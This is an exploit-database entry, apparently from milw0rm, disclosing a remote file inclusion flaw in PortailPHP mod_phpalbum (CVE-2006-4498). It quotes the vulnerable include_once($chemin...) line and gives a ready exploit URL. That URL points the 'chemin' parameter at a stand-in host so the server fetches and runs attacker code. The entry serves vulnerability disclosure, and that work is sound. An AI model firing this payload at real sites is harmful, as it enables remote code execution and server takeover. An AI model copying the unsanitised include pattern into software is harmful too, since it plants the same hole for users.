PortailPHP mod_phpalbum 2.1.5 - 'chemin' Remote File Inclusion

Author: Mehmet Ince
type: webapps
platform: php
port: nan
date_added: 2006-08-28 
date_updated: 2006-08-29 
verified: 1 
codes: OSVDB-29847;CVE-2006-4498 
tags: 
aliases:  
screenshot_url:  
application_url: 

############################################################

#Portail PHP mod_phpalbum 2.15  Modules Remote File Inclusion Vulnerabilities

############################################################

#Author: XORON

############################################################

#Class: Remote

############################################################

#cont@ct: x0r0n[at]hotmail[dot]com

############################################################

#Code:  include_once ($chemin."conf/code.php")

############################################################

#Exploit: http://www.site.com/[path]/mod_phpalbum/sommaire_admin.php?chemin=http://evil_scripts?

############################################################

#Greetz: str0ke, Ironfist, Preddy, SHiKaA

############################################################

# milw0rm.com [2006-08-29]